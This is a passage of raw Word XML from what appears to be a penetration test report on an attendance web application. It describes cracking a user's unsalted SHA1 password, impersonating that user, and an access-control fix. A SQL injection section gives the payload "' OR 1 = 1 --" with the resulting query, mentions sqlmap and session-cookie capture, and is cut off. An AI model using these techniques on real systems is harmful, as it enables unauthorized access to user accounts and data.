        <w:t xml:space="preserve">As seen below, the credentials collected are formatted </w:t>
      </w:r>
      <w:r w:rsidR="00A3740B">
        <w:t>into a CSV file which an attacker can use to gain unauthorized access</w:t>
      </w:r>
      <w:r w:rsidR="00DB3614">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61D08F8B" w14:textId="49406838" w:rsidR="00987958" w:rsidRDefault="00987958" w:rsidP="00990A47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="46EAFD57" wp14:editId="7CA7409B">
            <wp:extent cx="5943600" cy="2006600"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946428" name="Picture 189464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8" name="Picture 18946428" descr="A screenshot of a computer&#10;&#10;Description automatically generated with medium confidenc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39994"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2006600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F07A56" w14:textId="77777777" w:rsidR="00DA670E" w:rsidRDefault="00DA670E" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1604699D" w14:textId="77777777" w:rsidR="00CF5232" w:rsidRDefault="00CF5232">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D039B01" w14:textId="081F97B5" w:rsidR="00D356AB" w:rsidRDefault="00D356AB" w:rsidP="00990A47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Using a</w:t>
      </w:r>
      <w:r w:rsidR="00CF5232">
        <w:t>n online</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> tool like Crack</w:t>
      </w:r>
      <w:r w:rsidR="00AC21AE">
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">tation for hash cracking, </w:t>
      </w:r>
      <w:r w:rsidR="007B5831">
        <w:t xml:space="preserve">the user fajar’s password </w:t>
      </w:r>
      <w:r w:rsidR="00B47348">
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidR="007B5831">
        <w:t>revealed to be “123” in plaintext. The hashing mode used was also discovered to be unsalted SHA1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F19B383" w14:textId="47337693" w:rsidR="007B5831" w:rsidRDefault="005B39D0" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658316" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7B8ECCFA" wp14:editId="293A834B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1414462</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1716723</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3119437" cy="200025"/>
                <wp:effectExtent l="0" t="0" r="24130" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="127" name="Rectangle 127"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="3119437"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012DAD">
              <v:rect id="Rectangle 127" style="position:absolute;margin-left:111.35pt;margin-top:135.2pt;width:245.6pt;height:15.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74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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="007B5831">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C956457" wp14:editId="3B807EB3">
            <wp:extent cx="5943600" cy="1984076"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="18946430" name="Picture 189464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0" name="Picture 18946430" descr="Graphical user interface, text, application&#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40644"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="1984076"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="794E1F4B" w14:textId="77777777" w:rsidR="00D70E0D" w:rsidRDefault="00D70E0D" w:rsidP="00290062">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18A3A88F" w14:textId="0EEA4471" w:rsidR="00D70E0D" w:rsidRDefault="00D70E0D" w:rsidP="00990A47">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Access into user account fajar was successful as seen below.</w:t>
      </w:r>
      <w:r w:rsidR="00A818CD">
        <w:t xml:space="preserve"> From there, an attacker can </w:t>
      </w:r>
      <w:r w:rsidR="00FB2A16">
        <w:t>impersonate the user and</w:t>
      </w:r>
      <w:r w:rsidR="000877EB">
        <w:t xml:space="preserve"> create, modify, and delete </w:t>
      </w:r>
      <w:r w:rsidR="00443209">
        <w:t>content</w:t>
      </w:r>
      <w:r w:rsidR="000877EB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00607423">
        <w:t>on the web application.</w:t>
      </w:r>
      <w:r w:rsidR="003C0D8C" w:rsidRPr="003C0D8C">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F73F944" w14:textId="5C2BEAD4" w:rsidR="00100A07" w:rsidRDefault="003C0D8C" w:rsidP="00BF0959">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3161"/>
        </w:tabs>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658317" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5FDC788B" wp14:editId="51CA567F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>5043488</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>334645</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="428307" cy="190500"/>
                <wp:effectExtent l="0" t="0" r="10160" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="193" name="Rectangle 193"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="428307"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901A60">
              <v:rect id="Rectangle 193" style="position:absolute;margin-left:397.15pt;margin-top:26.35pt;width:33.7pt;height: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E3D9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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D70E0D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="66C143D0" wp14:editId="5A780D29">
            <wp:extent cx="5205021" cy="2927268"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>
            <wp:docPr id="18946431" name="Picture 189464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1" name="Picture 18946431" descr="Graphical user interface, application, websit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26466" cy="2939328"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7467308A" w14:textId="77777777" w:rsidR="00BF0959" w:rsidRDefault="00BF0959">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="139" w:name="_Toc93487309"/>
      <w:bookmarkStart w:id="140" w:name="_Toc93502888"/>
      <w:bookmarkStart w:id="141" w:name="_Toc93526924"/>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F0A698" w14:textId="4B897C02" w:rsidR="00170CA0" w:rsidRDefault="00170CA0" w:rsidP="00100A07">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="142" w:name="_Toc94100255"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Recommendations</w:t>
      </w:r>
      <w:bookmarkEnd w:id="139"/>
      <w:bookmarkEnd w:id="140"/>
      <w:bookmarkEnd w:id="141"/>
      <w:bookmarkEnd w:id="142"/>
    </w:p>
    <w:p w14:paraId="2679C415" w14:textId="194E15EF" w:rsidR="0058072E" w:rsidRPr="0058072E" w:rsidRDefault="0058072E" w:rsidP="009A28B6">
      <w:r>
        <w:t xml:space="preserve">The web application can </w:t>
      </w:r>
      <w:r w:rsidR="006242ED">
        <w:t>mitigate this vulnerability by</w:t>
      </w:r>
      <w:r w:rsidR="008416CE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001031F1">
        <w:t xml:space="preserve">designing access control in such a way </w:t>
      </w:r>
      <w:r w:rsidR="00354A3D">
        <w:t xml:space="preserve">that not all users can </w:t>
      </w:r>
      <w:r w:rsidR="00D60929">
        <w:t>gain</w:t>
      </w:r>
      <w:r w:rsidR="00354A3D">
        <w:t xml:space="preserve"> access to the resources and functionalities unless it is </w:t>
      </w:r>
      <w:r w:rsidR="005C4900">
        <w:t>intended</w:t>
      </w:r>
      <w:r w:rsidR="00354A3D">
        <w:t xml:space="preserve"> to be publicly accessible.</w:t>
      </w:r>
      <w:r w:rsidR="005C4900">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0003319B">
        <w:t>For this vulnerability, Permission-Based Access Control can be implemented</w:t>
      </w:r>
      <w:r w:rsidR="00A52030">
        <w:t>, where the authorization layer checks if the user has permission to access data or to perform a particular action, typically by checking if the user</w:t>
      </w:r>
      <w:r w:rsidR="002B67AC">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00A52030">
        <w:t>s roles have this permission or not.</w:t>
      </w:r>
      <w:r w:rsidR="00663EC3">
        <w:t xml:space="preserve"> In this case, </w:t>
      </w:r>
      <w:r w:rsidR="00A34B6C">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00B11AA8">
        <w:t xml:space="preserve">backend processing </w:t>
      </w:r>
      <w:r w:rsidR="00961ECC">
        <w:t>can</w:t>
      </w:r>
      <w:r w:rsidR="00B11AA8">
        <w:t xml:space="preserve"> also</w:t>
      </w:r>
      <w:r w:rsidR="004131B4">
        <w:t xml:space="preserve"> verify if the </w:t>
      </w:r>
      <w:r w:rsidR="00F74996">
        <w:t xml:space="preserve">employer ID of the client </w:t>
      </w:r>
      <w:r w:rsidR="00C875D8">
        <w:t>request</w:t>
      </w:r>
      <w:r w:rsidR="00F74996">
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="003529E1">
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="00F74996">
        <w:t xml:space="preserve"> same as the </w:t>
      </w:r>
      <w:r w:rsidR="00ED4B22">
        <w:t>data retrieved</w:t>
      </w:r>
      <w:r w:rsidR="00C73CD1">
        <w:t xml:space="preserve"> from the database</w:t>
      </w:r>
      <w:r w:rsidR="0011755F">
        <w:t xml:space="preserve"> before </w:t>
      </w:r>
      <w:r w:rsidR="00D11E74">
        <w:t>sending to the</w:t>
      </w:r>
      <w:r w:rsidR="00240441">
        <w:t xml:space="preserve"> client</w:t>
      </w:r>
      <w:r w:rsidR="009F2A7E">
        <w:t xml:space="preserve">. With this implementation, </w:t>
      </w:r>
      <w:r w:rsidR="005B4525">
        <w:t>enumerati</w:t>
      </w:r>
      <w:r w:rsidR="00F80339">
        <w:t xml:space="preserve">on of other user credentials </w:t>
      </w:r>
      <w:r w:rsidR="0044795D">
        <w:t xml:space="preserve">would be </w:t>
      </w:r>
      <w:r w:rsidR="004C0608">
        <w:t>prevented,</w:t>
      </w:r>
      <w:r w:rsidR="00A1628B">
        <w:t xml:space="preserve"> and users can only gain access to their own personal information</w:t>
      </w:r>
      <w:r w:rsidR="0044795D">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B83AA42" w14:textId="453DB05B" w:rsidR="005F6E6B" w:rsidRDefault="005F6E6B">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="143" w:name="_Toc93487310"/>
      <w:bookmarkStart w:id="144" w:name="_Toc93502889"/>
      <w:bookmarkStart w:id="145" w:name="_Toc93526925"/>
    </w:p>
    <w:p w14:paraId="58F222BF" w14:textId="77777777" w:rsidR="00BF0959" w:rsidRDefault="00BF0959">
      <w:pPr>
        <w:spacing w:line="259" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
          <w:b/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8D20A6" w14:textId="35BE19D7" w:rsidR="00100A07" w:rsidRDefault="00100A07" w:rsidP="00100A07">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="146" w:name="_Toc94100256"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>SQL</w:t>
      </w:r>
      <w:r w:rsidR="003A1F9E">
        <w:t xml:space="preserve"> Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="143"/>
      <w:bookmarkEnd w:id="144"/>
      <w:bookmarkEnd w:id="145"/>
      <w:bookmarkEnd w:id="146"/>
    </w:p>
    <w:p w14:paraId="4961B9E4" w14:textId="328EF4EA" w:rsidR="000434E8" w:rsidRPr="000434E8" w:rsidRDefault="007E3E62" w:rsidP="000434E8">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A46C7B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>Performed by: Glenn</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA01D19" w14:textId="19804E8A" w:rsidR="00886E19" w:rsidRDefault="00886E19" w:rsidP="00D75B85">
      <w:r>
        <w:t xml:space="preserve">In this exploit, the attacker was able to retrieve and view </w:t>
      </w:r>
      <w:r w:rsidR="00C61652">
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">users table and other relevant user’s data as part of the web application. The point of entry was identified to be a weakness in the web application due to </w:t>
      </w:r>
      <w:r w:rsidR="003529E1">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>lack of input validation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FE3AD4" w14:textId="6A510BA9" w:rsidR="00316B57" w:rsidRDefault="00A35344" w:rsidP="009A28B6">
      <w:r>
        <w:t xml:space="preserve">This injection attack can be exploited using </w:t>
      </w:r>
      <w:r w:rsidR="002D490D">
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:t>map which is a</w:t>
      </w:r>
      <w:r w:rsidR="00E5672C">
        <w:t>n open-source</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> penetration testing tool that automates the detection and </w:t>
      </w:r>
      <w:r w:rsidR="00DC40A3">
        <w:t>exploits</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> of SQL injection issues, as well as the takeover of database servers. It includes a robust detection engine, several specialist features, and a wide variety of switches that include database fingerprinting, data pulling from databases, accessing the underlying file system, and out-of-band command execution on the operating system.</w:t>
      </w:r>
      <w:r w:rsidR="00C15444">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A4354E">
        <w:t>This tool would be used in exploiting the web application.</w:t>
      </w:r>
      <w:r w:rsidR="009C34A0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A335FEC" w14:textId="76E92FF6" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="009A28B6">
      <w:r w:rsidRPr="0021477C">
        <w:t>Following th</w:t>
      </w:r>
      <w:r>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:t xml:space="preserve"> discovery</w:t>
      </w:r>
      <w:r w:rsidR="00D21C30">
        <w:t xml:space="preserve"> of the vulnerability seen in the </w:t>
      </w:r>
      <w:r w:rsidR="00B56612">
        <w:t xml:space="preserve">manual </w:t>
      </w:r>
      <w:r w:rsidR="00D21C30">
        <w:t>testing phase</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:t xml:space="preserve">, adding “’ OR 1 = 1 </w:t>
      </w:r>
      <w:r w:rsidR="004C2D19">
        <w:t>--</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:t>%20” (%20 is whitespace in URL encoding) displayed all the entries belonging to that user despite the date filtered to 202</w:t>
      </w:r>
      <w:r w:rsidR="007D7BA5">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="007D7BA5">
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:t>-1</w:t>
      </w:r>
      <w:r w:rsidR="007D7BA5">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:t xml:space="preserve"> which should have no records as shown previously. The query processed by the database was “</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>SELECT * FROM `attendances` WHERE `attendances`.`date_work` BETWEEN ‘202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>’ AND ‘202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>17</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:rPr>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t xml:space="preserve">’ OR 1 = 1 -- </w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:rPr>
          <w:color w:val="767171" w:themeColor="background2" w:themeShade="80"/>
        </w:rPr>
        <w:t>’ AND `attendance_employee` = ‘8’ ORDER BY `attendances`.`attendance_id` ASC</w:t>
      </w:r>
      <w:r w:rsidRPr="0021477C">
        <w:t xml:space="preserve">”. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55B5F122" w14:textId="6AE1E720" w:rsidR="004E3E0B" w:rsidRDefault="004A385F" w:rsidP="001F0A6F">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658319" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="36CD9DB5" wp14:editId="0A82A074">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>723900</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>201613</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2871788" cy="166687"/>
                <wp:effectExtent l="0" t="0" r="24130" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="194" name="Rectangle 194"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2871788" cy="1666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EB0B7A">
              <v:rect id="Rectangle 194" style="position:absolute;margin-left:57pt;margin-top:15.9pt;width:226.15pt;height:13.1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337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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="55D9B0BA" wp14:editId="1B5DAEA8">
            <wp:extent cx="5943600" cy="3343910"/>
            <wp:effectExtent l="0" t="0" r="0" b="889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FBA5F94" w14:textId="102D3322" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="009A28B6">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Since this web application requires authentication to access that specific page, the user’s cookie must be obtained. This can be easily done using a Cookie Editor.</w:t>
      </w:r>
      <w:r w:rsidR="004A385F" w:rsidRPr="004A385F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D371FC8" w14:textId="310F63D6" w:rsidR="00CE37EA" w:rsidRDefault="004A385F" w:rsidP="00296845">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658320" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7FCDFE50" wp14:editId="00B1E73B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4000500</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>726123</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1257300" cy="261937"/>
                <wp:effectExtent l="0" t="0" r="19050" b="24130"/>
                <wp:wrapNone/>
                <wp:docPr id="195" name="Rectangle 195"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="1257300" cy="2619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05F78C">
              <v:rect id="Rectangle 195" style="position:absolute;margin-left:315pt;margin-top:57.2pt;width:99pt;height:20.6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3899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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001F0A6F">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="740229C3" wp14:editId="67D801AB">
            <wp:extent cx="5345160" cy="2214748"/>
            <wp:effectExtent l="0" t="0" r="8255" b="0"/>
            <wp:docPr id="209" name="Picture 20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website&#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26353"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5373046" cy="2226303"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD48638" w14:textId="10792040" w:rsidR="001F0A6F" w:rsidRDefault="001F0A6F" w:rsidP="001F0A6F"/>
    <w:p w14:paraId="6EE1B9D6" w14:textId="759FB606" w:rsidR="00D01D86" w:rsidRDefault="00D01D86" w:rsidP="001F0A6F">
      <w:r>
        <w:t>Alternatively, using a live HTTP capture produces the same result.</w:t>
      </w:r>
      <w:r w:rsidR="00EB0B1B" w:rsidRPr="00EB0B1B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13BC08ED" w14:textId="0B16EA9C" w:rsidR="00D01D86" w:rsidRDefault="00EB0B1B" w:rsidP="00D01D86">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658321" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="5DF0EF4D" wp14:editId="0BC1C07B">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>823913</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1021716</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2438400" cy="1524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24384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C1CC0F">
              <v:rect id="Rectangle 196" style="position:absolute;margin-left:64.9pt;margin-top:80.45pt;width:192pt;height:1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A299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"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00D01D86">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
